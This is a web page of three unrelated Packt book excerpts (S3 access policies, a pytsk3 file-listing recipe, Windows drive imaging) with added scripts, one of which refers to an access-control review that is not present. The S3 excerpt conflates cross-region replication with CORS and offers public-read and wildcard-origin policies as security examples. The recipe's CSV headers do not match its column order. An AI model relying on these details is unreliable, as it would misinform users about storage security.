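As an addendum to this excerpt, part of the access control review described above can be scripted. The sketch below, which is illustrative and not from the book, loads a service's policy.json and prints every rule that mentions admin, a quick sanity check to run before and after policy changes; the file path is only an example.

    import json

    POLICY_FILE = "/etc/nova/policy.json"   # example path; each service ships its own policy.json

    with open(POLICY_FILE) as policy_file:
        policy = json.load(policy_file)

    # Print every target whose rule mentions "admin" so changes can be reviewed at a glance
    for target, rule in sorted(policy.items()):
        if "admin" in str(rule):
            print("{:55s} {}".format(target, rule))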

Amazon S3 Security access and policies

Savia Lobo
03 May 2018
7 min read
In this article, you will get to know about Amazon S3, and the security access and policies associated with it.  AWS provides you with S3 as the object storage, where you can store your object files from 1 KB to 5 TB in size at a low cost. It's highly secure, durable, and scalable, and has unlimited capacity. It allows concurrent read/write access to objects by separate clients and applications. You can store any type of file in AWS S3 storage. [box type="shadow" align="" class="" width=""]This article is an excerpt taken from the book,' Cloud Security Automation', written by Prashant Priyam.[/box] AWS keeps multiple copies of all the data stored in the standard S3 storage, which are replicated across devices in the region to ensure the durability of 99.999999999%. S3 cannot be used as block storage. AWS S3 storage is further categorized into three different sections: S3 Standard: This is suitable when we need durable storage for files with frequent access. Reduced Redundancy Storage: This is suitable when we have less critical data that is persistent in nature. Infrequent Access (IA): This is suitable when you have durable data with nonfrequent access. You can opt for Glacier. However, in Glacier, you have a very long retrieval time. So, S3 IA becomes a suitable option. It provides the same performance as the S3 Standard storage. AWS S3 has inbuilt error correction and fault tolerance capabilities. Apart from this, in S3 you have an option to enable versioning and cross-region replication (cross-origin resource sharing (CORS)). If you want to enable versioning on any existing bucket, versioning will be enabled only for new objects in that bucket, not for existing objects. This also happens in the case of CORS, where you can enable cross-region replication, but it will be applicable only for new objects. Security in Amazon S3 S3 is highly secure storage. Here, we can enable fine-grained access policies for resource access and encryption. To enable access-level security, you can use the following: S3 bucket policy IAM access policy MFA for object deletion The S3 bucket policy is a JSON code that defines what will be accessed by whom and at what level: { "Version": "2008-10-17", "Statement": [ { "Sid": "AllowPublicRead", "Effect": "Allow", "Principal": { "AWS": "*" }, "Action": [ "s3:GetObject" ], "Resource": [ "arn:aws:s3:::prashantpriyam/*" ] } ] } In the preceding JSON code, we have just allowed read-only access to all the objects (as defined in the Action section) for an S3 bucket named prashantpriyam (defined in the Resource section). Similar to the S3 bucket policy, we can also define an IAM policy for S3 bucket access: { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "s3:GetBucketLocation", "s3:ListAllMyBuckets" ], "Resource": "arn:aws:s3:::*" }, { "Effect": "Allow", "Action": ["s3:ListBucket"], "Resource": ["arn:aws:s3:::prashantpriyam"] }, { "Effect": "Allow", "Action": [ "s3:PutObject", "s3:GetObject", "s3:DeleteObject" ], "Resource": ["arn:aws:s3:::prashantpriyam/*"] } ] } In the preceding policy, we want to give the user full permissions on the S3 bucket from the AWS console as well. 
In the following section of policy (JSON code), we have granted permission to the user to get the bucket location and list all the buckets for traversal, but here we cannot perform other operations, such as getting object details from the bucket: { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "s3:GetBucketLocation", "s3:ListAllMyBuckets" ], "Resource": "arn:aws:s3:::*" }, { "Effect": "Allow", "Action": ["s3:ListBucket"], "Resource": ["arn:aws:s3:::prashantpriyam"] }, While in the second section of the policy (specified as follows), we have given permission to users to traverse into the prashantpriyam bucket and perform PUT, GET, and DELETE operations on the object: { "Effect": "Allow", "Action": [ "s3:PutObject", "s3:GetObject", "s3:DeleteObject" ], "Resource": ["arn:aws:s3:::prashantpriyam/*"] } MFA enables additional security on your account where, after password-based authentication, it asks you to provide the temporary code generated from AWS MFA. We can also use a virtual MFA such as Google Authenticator. AWS S3 supports MFA-based API, which helps to enforce MFA-based access policy on S3 bucket. Let's look at an example where we are giving users read-only access to a bucket while all other operations require an MFA token, which will expire after 600 seconds: { "Version": "2012-10-17", "Statement": [ { "Sid": "", "Effect": "Deny", "Principal": "*", "Action": "s3:*", "Resource": "arn:aws:s3:::prashantpriyam/priyam/*", "Condition": {"Null": {"aws:MultiFactorAuthAge": true }} }, { "Sid": "", "Effect": "Deny", "Principal": "*", "Action": "s3:*", "Resource": "arn:aws:s3:::prashantpriyam/priyam/*", "Condition": {"NumericGreaterThan": {"aws:MultiFactorAuthAge": 600 }} }, { "Sid": "", "Effect": "Allow", "Principal": "*", "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::prashantpriyam/*" } ] } In the preceding code, you can see that we have allowed all the operations on the S3 bucket if they have an MFA token whose life is less than 600 seconds. Apart from MFA, we can enable versioning so that S3 can automatically create multiple versions of the object to eliminate the risk of unwanted modification of data. This can be enabled with the AWS Console only. You can also enable cross-region replication so that the S3 bucket content can be replicated to the other selected regions. This option is mostly used when you want to deliver static content into two different regions, but it also gives you redundancy. For infrequently accessed data you can enable a lifecycle policy, which helps you to transfer the objects to a low-cost archival storage called Glacier. Let's see how to secure the S3 bucket using the AWS Console. To do this, we need to log in to the S3 bucket and search for S3. Now, click on the bucket you want to secure: In the screenshot, we have selected the bucket called velocis-manali-trip-112017 and, in the bucket properties, we can see that we have not enabled the security options that we have learned so far. Let's implement the security. Now, we need to click on the bucket and then on the Properties tab. From here, we can enable Versioning, Default encryption, Server access logging, and Object-level logging: To enable Server access logging, you need to specify the name of the bucket and a prefix for the logs: To enable encryption, you need to specify whether you want to use AES 256 or AWS KMS based encryption. Now, click on the Permission tab. 
From here, you will be able to define the Access Control List, Bucket Policy, and CORS configuration: In Access Control List, you can define who will access what and to what extent, in Bucket Policy you define resource-based permissions on the bucket (like we have seen in the example for bucket policy), and in CORS configuration we define the rule for CORS. Let's look at a sample CORS file: <!-- Sample policy --> <CORSConfiguration> <CORSRule> <AllowedOrigin>*</AllowedOrigin> <AllowedMethod>GET</AllowedMethod> <MaxAgeSeconds>3000</MaxAgeSeconds> <AllowedHeader>Authorization</AllowedHeader> </CORSRule> </CORSConfiguration> It's an XML script that allows read-only permission to all the origins. In the preceding code, instead of a URL, the origin is the wildcard *, which means anyone. Now, click on the Management section. From here, we define the life cycle rule, replication, and so on: In life cycle rules, an S3 bucket object is transferred to the Standard-IA tier after 30 days and transferred to Glacier after 60 days. This is how we define security on the S3 bucket. To summarize, we learned about security access and policies in Amazon S3. If you've enjoyed reading this, do check out this book, 'Cloud Security Automation' to know how private cloud security functions can be automated for better time and cost-effectiveness. Creating and deploying an Amazon Redshift cluster Amazon Sagemaker makes machine learning on the cloud easy How cybersecurity can help us secure cyberspace
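To round off this excerpt, the same controls that were just configured in the console can be applied programmatically. The following hedged boto3 sketch applies the read-only bucket policy shown earlier and the 30/60-day lifecycle transitions described above; the bucket name matches the example and everything else is illustrative.

    import json
    import boto3

    s3 = boto3.client("s3")
    bucket = "prashantpriyam"   # bucket name from the example

    read_only_policy = {
        "Version": "2008-10-17",
        "Statement": [{
            "Sid": "AllowPublicRead",
            "Effect": "Allow",
            "Principal": {"AWS": "*"},
            "Action": ["s3:GetObject"],
            "Resource": ["arn:aws:s3:::{}/*".format(bucket)],
        }],
    }
    s3.put_bucket_policy(Bucket=bucket, Policy=json.dumps(read_only_policy))

    # Mirror the console lifecycle rule: Standard-IA after 30 days, Glacier after 60
    s3.put_bucket_lifecycle_configuration(
        Bucket=bucket,
        LifecycleConfiguration={
            "Rules": [{
                "ID": "tier-then-archive",
                "Status": "Enabled",
                "Filter": {"Prefix": ""},
                "Transitions": [
                    {"Days": 30, "StorageClass": "STANDARD_IA"},
                    {"Days": 60, "StorageClass": "GLACIER"},
                ],
            }],
        },
    )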

Working with Forensic Evidence Container Recipes

Packt
07 Mar 2018
13 min read
In this article by Preston Miller and Chapin Bryce, authors of Learning Python for Forensics, we introduce a recipe from our upcoming book, Python Digital Forensics Cookbook. In Python Digital Forensics Cookbook, each chapter is comprised of many scripts, or recipes, falling under specific themes. The "Iterating Through Files" recipe shown here is from our chapter that introduces the Sleuth Kit's Python bindings, pytsk3, and other libraries, to programmatically interact with forensic evidence containers. Specifically, this recipe shows how to access a forensic evidence container and iterate through all of its files to create an active file listing of its contents. (For more resources related to this topic, see here.) If you are reading this article, it goes without saying that Python is a key tool in DFIR investigations. However, most examiners are not familiar with or do not take advantage of the Sleuth Kit's Python bindings. Imagine being able to run your existing scripts against forensic containers without needing to mount them or export loose files. This recipe continues to introduce the library, pytsk3, that will allow us to do just that and take our scripting capabilities to the next level. In this recipe, we learn how to recurse through the filesystem and create an active file listing. Oftentimes, one of the first questions we, as the forensic examiner, are asked is "What data is on the device?". An active file listing comes in handy here. Creating a file listing of loose files is a very straightforward task in Python. However, this will be slightly more complicated because we are working with a forensic image rather than loose files. This recipe will be a cornerstone for future scripts as it will allow us to recursively access and process every file in the image. As we continue to introduce new concepts and features from the Sleuth Kit, we will add new functionality to our previous recipes in an iterative process. In a similar way, this recipe will become integral in future recipes to iterate through directories and process files. Getting started Refer to the Getting started section in the Opening Acquisitions recipe for information on the build environment and setup details for pytsk3 and pyewf. All other libraries used in this script are present in Python's standard library. How to do it... We perform the following steps in this recipe: Import argparse, csv, datetime, os, pytsk3, pyewf, and sys; Identify if the evidence container is a raw (DD) image or an EWF (E01) container; Access the forensic image using pytsk3; Recurse through all directories in each partition; Store file metadata in a list; And write the active file list to a CSV. How it works... This recipe's command-line handler takes three positional arguments: EVIDENCE_FILE, TYPE, and OUTPUT_CSV, which represent the path to the evidence file, the type of evidence file, and the output CSV file, respectively. Similar to the previous recipe, the optional p switch can be supplied to specify a partition type. We use the os.path.dirname() method to extract the desired output directory path for the CSV file and, with the os.makedirs() function, create the necessary output directories if they do not exist.
if __name__ == '__main__': # Command-line Argument Parser parser = argparse.ArgumentParser() parser.add_argument("EVIDENCE_FILE", help="Evidence file path") parser.add_argument("TYPE", help="Type of Evidence", choices=("raw", "ewf")) parser.add_argument("OUTPUT_CSV", help="Output CSV with lookup results") parser.add_argument("-p", help="Partition Type", choices=("DOS", "GPT", "MAC", "SUN")) args = parser.parse_args() directory = os.path.dirname(args.OUTPUT_CSV) if not os.path.exists(directory) and directory != "": os.makedirs(directory) Once we have validated the input evidence file by checking that it exists and is a file, the four arguments are passed to the main() function. If there is an issue with initial validation of the input, an error is printed to the console before the script exits. if os.path.exists(args.EVIDENCE_FILE) and os.path.isfile(args.EVIDENCE_FILE): main(args.EVIDENCE_FILE, args.TYPE, args.OUTPUT_CSV, args.p) else: print("[-] Supplied input file {} does not exist or is not a file".format(args.EVIDENCE_FILE)) sys.exit(1) In the main() function, we instantiate the volume variable with None to avoid errors referencing it later in the script. After printing a status message to the console, we check if the evidence type is an E01 to properly process it and create a valid pyewf handle as demonstrated in more detail in the Opening Acquisitions recipe. Refer to that recipe for more details as this part of the function is identical. The end result is the creation of the pytsk3 handle, img_info, for the user supplied evidence file. def main(image, img_type, output, part_type): volume = None print "[+] Opening {}".format(image) if img_type == "ewf": try: filenames = pyewf.glob(image) except IOError, e: print "[-] Invalid EWF format:n {}".format(e) sys.exit(2) ewf_handle = pyewf.handle() ewf_handle.open(filenames) # Open PYTSK3 handle on EWF Image img_info = ewf_Img_Info(ewf_handle) else: img_info = pytsk3.Img_Info(image) Next, we attempt to access the volume of the image using the pytsk3.Volume_Info() method by supplying it the image handle. If the partition type argument was supplied, we add its attribute ID as the second argument. If we receive an IOError when attempting to access the volume, we catch the exception as e and print it to the console. Notice, however, that we do not exit the script as we often do when we receive an error. We'll explain why in the next function. Ultimately, we pass the volume, img_info, and output variables to the openFS() method. try: if part_type is not None: attr_id = getattr(pytsk3, "TSK_VS_TYPE_" + part_type) volume = pytsk3.Volume_Info(img_info, attr_id) else: volume = pytsk3.Volume_Info(img_info) except IOError, e: print "[-] Unable to read partition table:n {}".format(e) openFS(volume, img_info, output) The openFS() method tries to access the filesystem of the container in two ways. If the volume variable is not None, it iterates through each partition, and if that partition meets certain criteria, attempts to open it. If, however, the volume variable is None, it instead tries to directly call the pytsk3.FS_Info() method on the image handle, img. As we saw, this latter method will work and give us filesystem access for logical images whereas the former works for physical images. Let's look at the differences between these two methods. Regardless of the method, we create a recursed_data list to hold our active file metadata. 
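One note on the code above: it instantiates an ewf_Img_Info class that is defined in the Opening Acquisitions recipe rather than reproduced in this excerpt. If you do not have that recipe to hand, the class follows the standard pyewf-to-pytsk3 bridging pattern, roughly as sketched below; treat it as a stand-in to compare against the original rather than a verbatim copy.

    import pytsk3
    import pyewf

    class ewf_Img_Info(pytsk3.Img_Info):
        # Presents an open pyewf handle to pytsk3 as if it were a raw image
        def __init__(self, ewf_handle):
            self._ewf_handle = ewf_handle
            super(ewf_Img_Info, self).__init__(url="", type=pytsk3.TSK_IMG_TYPE_EXTERNAL)

        def close(self):
            self._ewf_handle.close()

        def read(self, offset, size):
            # pytsk3 asks for arbitrary offsets; translate them into pyewf seek/read calls
            self._ewf_handle.seek(offset)
            return self._ewf_handle.read(size)

        def get_size(self):
            return self._ewf_handle.get_media_size()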
In the first instance, where we have a physical image, we iterate through each partition and check that is it greater than 2,048 sectors and does not contain the words "Unallocated", "Extended", or "Primary Table" in its description. For partitions meeting these criteria, we attempt to access its filesystem using the FS_Info() function by supplying the pytsk3 img object and the offset of the partition in bytes. If we are able to access the filesystem, we use to open_dir() method to get the root directory and pass that, along with the partition address ID, the filesystem object, two empty lists, and an empty string, to the recurseFiles() method. These empty lists and string will come into play in recursive calls to this function as we will see shortly. Once the recurseFiles() method returns, we append the active file metadata to the recursed_data list. We repeat this process for each partition def openFS(vol, img, output): print "[+] Recursing through files.." recursed_data = [] # Open FS and Recurse if vol is not None: for part in vol: if part.len > 2048 and "Unallocated" not in part.desc and "Extended" not in part.desc and "Primary Table" not in part.desc: try: fs = pytsk3.FS_Info(img, offset=part.start*vol.info.block_size) except IOError, e: print "[-] Unable to open FS:n {}".format(e) root = fs.open_dir(path="/") data = recurseFiles(part.addr, fs, root, [], [], [""]) recursed_data.append(data) We employ a similar method for the second instance, where we have a logical image, where the volume is None. In this case, we attempt to directly access the filesystem and, if successful, we pass that to the recurseFiles() method and append the returned data to our recursed_data list. Once we have our active file list, we send it and the user supplied output file path to the csvWriter() method. Let's dive into the recurseFiles() method which is the meat of this recipe. else: try: fs = pytsk3.FS_Info(img) except IOError, e: print "[-] Unable to open FS:n {}".format(e) root = fs.open_dir(path="/") data = recurseFiles(1, fs, root, [], [], [""]) recursed_data.append(data) csvWriter(recursed_data, output) The recurseFiles() function is based on an example of the FLS tool (https://github.com/py4n6/pytsk/blob/master/examples/fls.py) and David Cowen's Automating DFIR series tool dfirwizard (https://github.com/dlcowen/dfirwizard/blob/master/dfirwiza rd-v9.py). To start this function, we append the root directory inode to the dirs list. This list is used later to avoid unending loops. Next, we begin to loop through each object in the root directory and check that it has certain attributes we would expect and that its name is not either "." or "..". def recurseFiles(part, fs, root_dir, dirs, data, parent): dirs.append(root_dir.info.fs_file.meta.addr) for fs_object in root_dir: # Skip ".", ".." or directory entries without a name. if not hasattr(fs_object, "info") or not hasattr(fs_object.info, "name") or not hasattr(fs_object.info.name, "name") or fs_object.info.name.name in [".", ".."]: continue If the object passes that test, we extract its name using the info.name.name attribute. Next, we use the parent variable, which was supplied as one of the function's inputs, to manually create the file path for this object. There is no built-in method or attribute to do this automatically for us. We then check if the file is a directory or not and set the f_type variable to the appropriate type. If the object is a file, and it has an extension, we extract it and store it in the file_ext variable. 
If we encounter an AttributeError when attempting to extract this data we continue onto the next object. try: file_name = fs_object.info.name.name file_path = "{}/{}".format("/".join(parent), fs_object.info.name.name) try: if fs_object.info.meta.type == pytsk3.TSK_FS_META_TYPE_DIR: f_type = "DIR" file_ext = "" else: f_type = "FILE" if "." in file_name: file_ext = file_name.rsplit(".")[-1].lower() else: file_ext = "" except AttributeError: continue We create variables for the object size and timestamps. However, notice that we pass the dates to a convertTime() method. This function exists to convert the UNIX timestamps into a human-readable format. With these attributes extracted, we append them to the data list using the partition address ID to ensure we keep track of which partition the object is from size = fs_object.info.meta.size create = convertTime(fs_object.info.meta.crtime) change = convertTime(fs_object.info.meta.ctime) modify = convertTime(fs_object.info.meta.mtime) data.append(["PARTITION {}".format(part), file_name, file_ext, f_type, create, change, modify, size, file_path]) If the object is a directory, we need to recurse through it to access all of its sub-directories and files. To accomplish this, we append the directory name to the parent list. Then, we create a directory object using the as_directory() method. We use the inode here, which is for all intents and purposes a unique number and check that the inode is not already in the dirs list. If that were the case, then we would not process this directory as it would have already been processed. If the directory needs to be processed, we call the recurseFiles() method on the new sub_directory and pass it current dirs, data, and parent variables. Once we have processed a given directory, we pop that directory from the parent list. Failing to do this will result in false file path details as all of the former directories will continue to be referenced in the path unless removed. Most of this function was under a large try-except block. We pass on any IOError exception generated during this process. Once we have iterated through all of the subdirectories, we return the data list to the openFS() function. if f_type == "DIR": parent.append(fs_object.info.name.name) sub_directory = fs_object.as_directory() inode = fs_object.info.meta.addr # This ensures that we don't recurse into a directory # above the current level and thus avoid circular loops. if inode not in dirs: recurseFiles(part, fs, sub_directory, dirs, data, parent) parent.pop(-1) except IOError: pass dirs.pop(-1) return data Let's briefly look at the convertTime() function. We've seen this type of function before, if the UNIX timestamp is not 0, we use the datetime.utcfromtimestamp() method to convert the timestamp into a human-readable format. def convertTime(ts): if str(ts) == "0": return "" return datetime.utcfromtimestamp(ts) With the active file listing data in hand, we are now ready to write it to a CSV file using the csvWriter() method. If we did find data (i.e., the list is not empty), we open the output CSV file, write the headers, and loop through each list in the data variable. We use the csvwriterows() method to write each nested list structure to the CSV file. 
def csvWriter(data, output): if data == []: print "[-] No output results to write" sys.exit(3) print "[+] Writing output to {}".format(output) with open(output, "wb") as csvfile: csv_writer = csv.writer(csvfile) headers = ["Partition", "File", "File Ext", "File Type", "Create Date", "Modify Date", "Change Date", "Size", "File Path"] csv_writer.writerow(headers) for result_list in data: csv_writer.writerows(result_list) The screenshot below demonstrates the type of data this recipe extracts from forensic images. There's more... For this recipe, there are a number of improvements that could further increase its utility: Use tqdm, or another library, to create a progress bar to inform the user of the current execution progress. Learn about the additional metadata values that can be extracted from filesystem objects using pytsk3 and add them to the output CSV file. Summary In summary, we have learned how to use pytsk3 to recursively iterate through any supported filesystem by the Sleuth Kit. This comprises the basis of how we can use the Sleuth Kit to programmatically process forensic acquisitions. With this recipe, we will now be able to further interact with these files in future recipes.
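Picking up the first suggestion from the There's more... section, tqdm adds a progress bar with a one-line change to whichever loop dominates the run time. A minimal, self-contained sketch follows; tqdm is a third-party package (pip install tqdm), and the loop body here is only a stand-in for the recipe's per-object processing.

    from tqdm import tqdm
    import time

    work_items = range(250)                          # stand-in for partitions or file objects
    for item in tqdm(work_items, desc="Processing", unit="obj"):
        time.sleep(0.01)                             # stand-in for hashing or metadata extraction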

Windows Drive Acquisition

Packt
21 Jul 2017
13 min read
In this article, by Oleg Skulkin and Scar de Courcier, authors of Windows Forensics Cookbook, we  will cover drive acquisition in E01 format with FTK Imager, drive acquisition in RAW Format with DC3DD, and mounting forensic images with Arsenal Image Mounter. (For more resources related to this topic, see here.) Before you can begin analysing evidence from a source, it first of all, needs to be imaged. This describes a forensic process in which an exact copy of a drive is taken. This is an important step, especially if evidence needs to be taken to court because forensic investigators must be able to demonstrate that they have not altered the evidence in any way. The term forensic image can refer to either a physical or a logical image. Physical images are precise replicas of the drive they are referencing, whereas a logical image is a copy of a certain volume within that drive. In general, logical images show what the machine’s user will have seen and dealt with, whereas physical images give a more comprehensive overview of how the device works at a higher level. A hash value is generated to verify the authenticity of the acquired image. Hash values are essentially cryptographic digital fingerprints which show whether a particular item is an exact copy of another. Altering even the smallest bit of data will generate a completely new hash value, thus demonstrating that the two items are not the same. When a forensic investigator images a drive, they should generate a hash value for both the original drive and the acquired image. Some pieces of forensic software will do this for you. There are a number of tools available for imaging hard drives, some of which are free and open source. However, the most popular way for forensic analysts to image hard drives is by using one of the more well-known forensic software vendors solutions. This is because it is imperative to be able to explain how the image was acquired and its integrity, especially if you are working on a case that will be taken to court. Once you have your image, you will then be able to analyse the digital evidence from a device without directly interfering with the device itself. In this chapter, we will be looking at various tools that can help you to image a Windows drive, and taking you through the process of acquisition. Drive acquisition in E01 format with FTK Imager FTK Imager is an imaging and data preview tool by AccessData, which allows an examiner not only to create forensic images in different formats, including RAW, SMART, E01 and AFF, but also to preview data sources in a forensically sound manner. In the first recipe of this article, we will show you how to create a forensic image of a hard drive from a Windows system in E01 format. E01 or EnCase's Evidence File is a standard format for forensic images in law enforcement. Such images consist of a header with case info, including acquisition date and time, examiner's name, acquisition notes, and password (optional), bit-by-bit copy of an acquired drive (consists of data blocks, each is verified with its own CRC or Cyclical Redundancy Check), and a footer with MD5 hash for the bitstream.  Getting ready First of all, let's download FTK Imager from AccessData website. To do it, go to SOLUTIONS tab, and after - to Product Downloads. Now choose DIGITAL FORENSICS, and after - FTK Imager. At the time of this writing, the most up-to-date version is 3.4.3, so click DOWNLOAD PAGE green button on the right. Ok, now you should be at the download page. 
Click on DOWNLOAD NOW button and fill in the form, after this you'll get the download link to the email you provided. The installation process is quite straightforward, all you need is just click Next a few times, so we won't cover it in the recipe. How to do it... There are two ways of initiating drive imaging process: Using Create Disk Image button from the Toolbar as shown in the following figure: Create Disk Image button on the Toolbar Use Create Disk Image option from the File menu as shown in the following figure: Create Disk Image... option in the File Menu You can choose any option you like. The first window you see is Select Source. Here you have five options: Physical Drive: This allows you to choose a physical drive as the source, with all partitions and unallocated space Logical Drive: This allows you to choose a logical drive as the source, for example, E: drive Image File: This allows you to choose an image file as the source, for example, if you need to convert you forensic image from one format to another Contents of a Folder: This allows you to choose a folder as the source, of course, no deleted files, and so on will be included Fernico Device: This allows you to restore images from multiple CD/DVD Of course, we want to image the whole drive to be able to work with deleted data and unallocated space, so: Let's choose Physical Drive option. Evidence source mustn't be altered in any way, so make sure you are using a hardware write blocker, you can use the one from Tableau, for example. These devices allow acquisition of  drive contents without creating the possibility of modifying the data.  FTK Imager Select Source window Click Next and you'll see the next window - Select Drive. Now you should choose the source drive from the drop down menu, in our case it's .PHYSICALDRIVE2. FTK Imager Select Drive window Ok, the source drive is chosen, click Finish. Next window - Create Image. We'll get back to this window soon, but for now, just click Add...  It's time to choose the destination image type. As we decided to create our image in EnCase's Evidence File format, let's choose E01. FTK Imager Select Image Type window Click Next and you'll see Evidence Item Information window. Here we have five fields to fill in: Case Number, Evidence Number, Unique Description, Examiner and Notes. All fields are optional. FTK Imager Evidence Item Information window Filled the fields or not, click Next. Now choose image destination. You can use Browse button for it. Also, you should fill in image filename. If you want your forensic image to be split, choose fragment size (in megabytes). E01 format supports compression, so if you want to reduce the image size, you can use this feature, as you can see in the following figure, we have chosen 6. And if you want the data in the image to be secured, use AD Encryption feature. AD Encryption is a whole image encryption, so not only is the raw data encrypted, but also any metadata. Each segment or file of the image is encrypted with a randomly generated image key using AES-256. FTK Imager Select Image Destination window Ok, we are almost done. Click Finish and you'll see Create Image window again. Now, look at three options at the bottom of the window. The verification process is very important, so make sure Verify images after they are created option is ticked, it helps you to be sure that the source and the image are equal. Precalculate Progress Statistics option is also very useful: it will show you estimated time of arrival during the imaging process. 
The last option will create directory listings of all files in the image for you, but of course, it takes time, so use it only if you need it.

FTK Imager Create Image window

All you need to do now is click Start - the imaging process begins. When the image is created, the verification process starts. Finally, you'll get the Drive/Image Verify Results window, like the one in the following figure:

FTK Imager Drive/Image Verify Results window

As you can see, in our case the source and the image are identical: both hashes matched. In the folder with the image, you will also find an info file with valuable information such as drive model, serial number, source data size, sector count, MD5 and SHA1 checksums, and so on.

How it works...

FTK Imager uses the physical drive of your choice as the source and creates a bit-by-bit image of it in EnCase's Evidence File format. During the verification process, the MD5 and SHA1 hashes of the image and the source are compared.

See more

FTK Imager download page: http://accessdata.com/product-download/digital-forensics/ftk-imager-version-3.4.3
FTK Imager User Guide: https://ad-pdf.s3.amazonaws.com/Imager/3_4_3/FTKImager_UG.pdf

Drive acquisition in RAW format with DC3DD

DC3DD is a patched (by Jesse Kornblum) version of the classic GNU dd utility with some computer forensics features, for example, on-the-fly hashing with a number of algorithms (MD5, SHA-1, SHA-256, and SHA-512), showing the progress of the acquisition process, and so on.

Getting ready

You can find a compiled standalone 64-bit version of DC3DD for Windows at SourceForge. Just download the ZIP or 7z archive, unpack it, and you are ready to go.

How to do it...

Open Windows Command Prompt, change directory (you can use the cd command) to the one with dc3dd.exe, and type the following command:

dc3dd.exe if=\\.\PHYSICALDRIVE2 of=X:\147-2017.dd hash=sha256 log=X:\147-2017.log

Press Enter and the acquisition process will start. Of course, your command will be a bit different, so let's find out what each part of it means:

if: This stands for input file. dd is originally a Linux utility, and in Linux everything is a file; as you can see in our command, we put physical drive 2 here (this is the drive we wanted to image, but in your case it may be another drive, depending on the number of drives connected to your workstation).
of: This stands for output file. Here you should type the destination of your image which, as you remember, is in RAW format; in our case it's the X: drive and the 147-2017.dd file.
hash: As already mentioned, DC3DD supports four hashing algorithms: MD5, SHA-1, SHA-256, and SHA-512. We chose SHA-256, but you can choose the one you like.
log: Here you should type the destination for the log; after the acquisition is completed, you will find the tool version, the image hash, and so on in this file.

How it works...

DC3DD creates a bit-by-bit image of the source drive in RAW format, so the size of the image will be the same as the source, and it calculates the image hash using the algorithm of the examiner's choice, in our case SHA-256.
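
Because a RAW image is an exact byte-for-byte copy, you can independently re-verify it at any time by recomputing the hash of the .dd file and comparing it with the value recorded in the dc3dd log. The following is a minimal Python sketch of that check; the image path is the one from this recipe and the expected hash string is a placeholder, so substitute your own values.

import hashlib

# Placeholders from this recipe - replace with your own image path and
# the SHA-256 value recorded in the dc3dd log file.
IMAGE_PATH = r"X:\147-2017.dd"
EXPECTED_SHA256 = "put-the-hash-from-the-dc3dd-log-here"

def sha256_of_file(path, chunk_size=1024 * 1024):
    """Hash the file in chunks so even very large images fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

if __name__ == "__main__":
    actual = sha256_of_file(IMAGE_PATH)
    print("Calculated:", actual)
    print("Expected:  ", EXPECTED_SHA256)
    print("Match!" if actual.lower() == EXPECTED_SHA256.lower() else "MISMATCH - investigate!")

Note that this only works for RAW images: an E01 file stores the acquisition hash inside a container, so hashing the .E01 file itself will not reproduce it - use FTK Imager's verification for that.
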
See also

DC3DD download page: https://sourceforge.net/projects/dc3dd/files/dc3dd/7.2%20-%20Windows/

Mounting forensic images with Arsenal Image Mounter

Arsenal Image Mounter is an open source tool developed by Arsenal Recon. It helps a digital forensic examiner mount a forensic image or virtual machine disk in Windows. It supports both E01 (and Ex01) and RAW forensic images, so you can use it with any of the images we created in the previous recipes. It's very important to note that Arsenal Image Mounter mounts the contents of disk images as complete disks. The tool supports all file systems you can find on Windows drives: NTFS, ReFS, FAT32, and exFAT. It also has temporary write support for images, which is a very useful feature, for example, if you want to boot a system from the image you are examining.

Getting ready

Go to the Arsenal Image Mounter page on the Arsenal Recon website and click on the Download button to download the ZIP archive. At the time of this writing, the latest version of the tool is 2.0.010, so in our case the archive is named Arsenal_Image_Mounter_v2.0.010.0_x64.zip. Extract it to a location of your choice and you are ready to go; no installation is needed.

How to do it...

There are two ways to choose an image for mounting in Arsenal Image Mounter:

Use the File menu and choose Mount image.
Use the Mount image button, as shown in the following figure:

Arsenal Image Mounter main window

When you choose the Mount image option from the File menu or click on the Mount image button, an Open window will pop up - here you should choose an image for mounting. The next window you will see is Mount options, like the one in the following figure:

Arsenal Image Mounter Mount options window

As you can see, there are a few options here:

Read only: If you choose this option, the image is mounted in read-only mode, so no write operations are allowed. (Do you still remember that you mustn't alter the evidence in any way? Of course, it's already an image, not the original drive, but nevertheless.)
Fake disk signatures: If an all-zero disk signature is found on the image, Arsenal Image Mounter reports a random disk signature to Windows, so it's mounted properly.
Write temporary: If you choose this option, the image is mounted in read-write mode, but all modifications are written not to the original image file, but to a temporary differential file.
Write original: Again, this option mounts the image in read-write mode, but this time the original image file will be modified.
Sector size: This option allows you to choose the sector size.
Create "removable" disk device: This option emulates the attachment of a USB thumb drive.

Choose the options you need and click OK. We decided to mount our image as read only. Now you can see a hard drive icon in the main window of the tool - the image is mounted. If you mounted only one image and want to unmount it, select the image and click on the Remove selected button. If you have a few mounted images and want to unmount all of them, click on the Remove all button.

How it works...

Arsenal Image Mounter mounts forensic images or virtual machine disks as complete disks in read-only or read-write mode. A digital forensics examiner can then access their contents even with Windows Explorer.
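
Once the image is mounted read only and has received a drive letter, you can triage it with ordinary tools and scripts, not just Windows Explorer. The following is a minimal Python sketch that walks a mounted volume and records the SHA-256 of every file; the drive letter F: is only an assumption for illustration - use whatever letter Windows assigned to the mounted image.

import csv
import hashlib
import os

# Assumption: Windows assigned F: to the volume mounted by Arsenal Image Mounter.
MOUNTED_VOLUME = "F:\\"
REPORT = "file_hashes.csv"

def sha256_of_file(path, chunk_size=1024 * 1024):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

with open(REPORT, "w", newline="", encoding="utf-8") as out:
    writer = csv.writer(out)
    writer.writerow(["path", "size_bytes", "sha256"])
    for root, _dirs, files in os.walk(MOUNTED_VOLUME):
        for name in files:
            path = os.path.join(root, name)
            try:
                writer.writerow([path, os.path.getsize(path), sha256_of_file(path)])
            except OSError as err:  # locked or system files are common on mounted volumes
                writer.writerow([path, "error", str(err)])

print("Hash report written to", REPORT)

Because the image is mounted read only, a script like this can be run repeatedly without any risk of altering the evidence.
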
See also

Arsenal Image Mounter page at the Arsenal Recon website: https://arsenalrecon.com/apps/image-mounter/

Summary

In this article, the author has explained the process and importance of drive acquisition using imaging tools such as FTK Imager and DC3DD. Drive acquisition is the first step in the analysis of digital evidence and needs to be carried out with the utmost care, which in turn makes the analysis process smooth.

